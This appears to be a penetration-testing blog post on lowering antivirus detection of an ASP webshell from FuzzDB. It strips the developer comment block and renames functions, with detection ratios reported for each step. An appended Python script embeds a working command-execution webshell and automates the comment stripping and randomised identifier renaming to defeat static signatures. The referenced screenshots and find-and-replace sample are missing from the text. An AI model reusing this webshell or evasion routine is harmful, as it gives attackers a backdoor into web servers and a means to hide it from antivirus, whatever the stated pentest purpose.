Avoiding AntiVirus Detection - Lame Way

In most pentest engagements we tend to upload clean web-shells rather than ones downloaded from the internet, so that the customer does not end up backdoored by a webshell we do not fully control. The webshells I personally use, and ask others to use too, are the ones from FuzzDB. They are pretty basic, but they are enough to prove the vulnerability and its impact to the customer. The catch is that since FuzzDB's release most antivirus vendors have picked up signatures for most of them and flag them as malicious, which in turn blocks us from uploading or executing them.

Let's just scan our sample webshell, cmd.asp, and see how malicious it looks.
Oops, the clean webshell is detected as malicious, with a pretty high detection ratio (27/55).


Come on, now let's just strip the developer comment block below from the webshell and try again.

<!--
ASP_KIT
cmd.asp = Command Execution
by: Maceo
modified: 25/06/2003
-->

Ohh, now we have a lower detection ratio than before (10/55).



We still have room to bring the detection ratio down further. Let's try replacing the function names and scanning again.

Below is a sample of the find-and-replace game.




Voila, we got the detection ratio down very low (1/55).
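The two steps above, stripping the developer comment block and renaming the functions and variables, as an added example in Python. This is not the original post's tooling and not FuzzDB code: the ASP sample is constructed for the demo to look like a command-execution page and is not the real cmd.asp, and the identifier list, the hot-string list and the helper names are assumptions chosen for the example.

```python
"""
Added example (not from the original post or FuzzDB): apply the post's two
steps, comment stripping and identifier renaming, to an ASP/VBScript source
and report which well-known strings survive the rewrite.  SAMPLE_ASP, RENAME
and HOT_STRINGS are constructed/assumed for this demo.
"""
import hashlib
import re
import secrets

# Constructed sample in the shape of an ASP command-execution page (not FuzzDB's cmd.asp).
SAMPLE_ASP = """<!--
ASP_KIT
demo.asp = Command Execution
by: someone
modified: 01/01/2003
-->
<%
' run a command and hand its output back to the caller
Function RunCmd(szCMD)
    Dim oScript, oExec
    Set oScript = Server.CreateObject("WScript.Shell")
    Set oExec = oScript.Exec("cmd.exe /c " & szCMD)
    RunCmd = oExec.StdOut.ReadAll()
End Function
Response.Write("<pre>" & Server.HTMLEncode(RunCmd(Request.Form("cmd"))) & "</pre>")
%>
"""

# Identifiers that are ours to rename (assumed list).  Built-in objects and methods
# (Server, Request, Response, CreateObject, Exec) and string literals are left alone:
# renaming them breaks the script, and the literals stay behind as signature material.
RENAME = ["RunCmd", "szCMD", "oScript", "oExec"]

# Strings a signature writer would plausibly key on (assumed list for the report).
HOT_STRINGS = ["ASP_KIT", "RunCmd", "szCMD", "WScript.Shell", "cmd.exe"]

HTML_COMMENT = re.compile(r"<!--.*?-->[ \t]*\r?\n?", re.DOTALL)
# Whole-line VBScript comments only, so an apostrophe inside a string ("don't") survives.
VB_COMMENT_LINE = re.compile(r"^[ \t]*'.*\r?\n?", re.MULTILINE)


def strip_comments(src: str) -> str:
    """Step 1: drop the <!-- --> header block and whole-line ' comments."""
    return VB_COMMENT_LINE.sub("", HTML_COMMENT.sub("", src))


def random_name() -> str:
    """A fresh VBScript-legal identifier: starts with a letter, then 8 hex chars."""
    return "v" + secrets.token_hex(4)


def rename_identifiers(src: str, names, mapping=None):
    """Step 2: whole-word, case-insensitive find and replace (VBScript is case-insensitive).
    Returns the rewritten source and the old->new mapping so the operator keeps notes."""
    mapping = dict(mapping or {})
    for name in names:
        mapping.setdefault(name, random_name())
    for old, new in mapping.items():
        src = re.sub(r"\b%s\b" % re.escape(old), new, src, flags=re.IGNORECASE)
    return src, mapping


def leftover_signatures(src: str, hot=HOT_STRINGS):
    """Hot strings still present after the rewrite (case-insensitive check)."""
    low = src.lower()
    return [h for h in hot if h.lower() in low]


def sha256_hex(data: str) -> str:
    return hashlib.sha256(data.encode("utf-8")).hexdigest()


def process(src: str, names=RENAME, mapping=None):
    """Run both steps and return what an operator would want to record."""
    stripped = strip_comments(src)
    renamed, mapping = rename_identifiers(stripped, names, mapping)
    return {
        "stripped": stripped,
        "renamed": renamed,
        "mapping": mapping,
        "leftover": leftover_signatures(renamed),
        "sha256_before": sha256_hex(src),
        "sha256_after": sha256_hex(renamed),
    }


if __name__ == "__main__":
    result = process(SAMPLE_ASP)
    print(result["renamed"])
    print("renamed:", result["mapping"])
    print("still present:", result["leftover"])
    print("sha256 before/after:", result["sha256_before"][:16], result["sha256_after"][:16])
```

Two things worth keeping in mind when running this against a real shell. First, it only defeats static string and hash signatures: the object names and string literals the script has to keep ("WScript.Shell", "cmd.exe") are exactly what the report lists as still present, and engines that emulate or watch behaviour are unaffected. Second, keep the printed mapping with your engagement notes, and remember that every re-scan on a multi-engine service submits the new sample to the vendors, so a 1/55 result tends not to stay that way.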

Reference: https://code.google.com/p/fuzzdb/
Got the idea for this from: https://www.offensivebits.com/?p=89
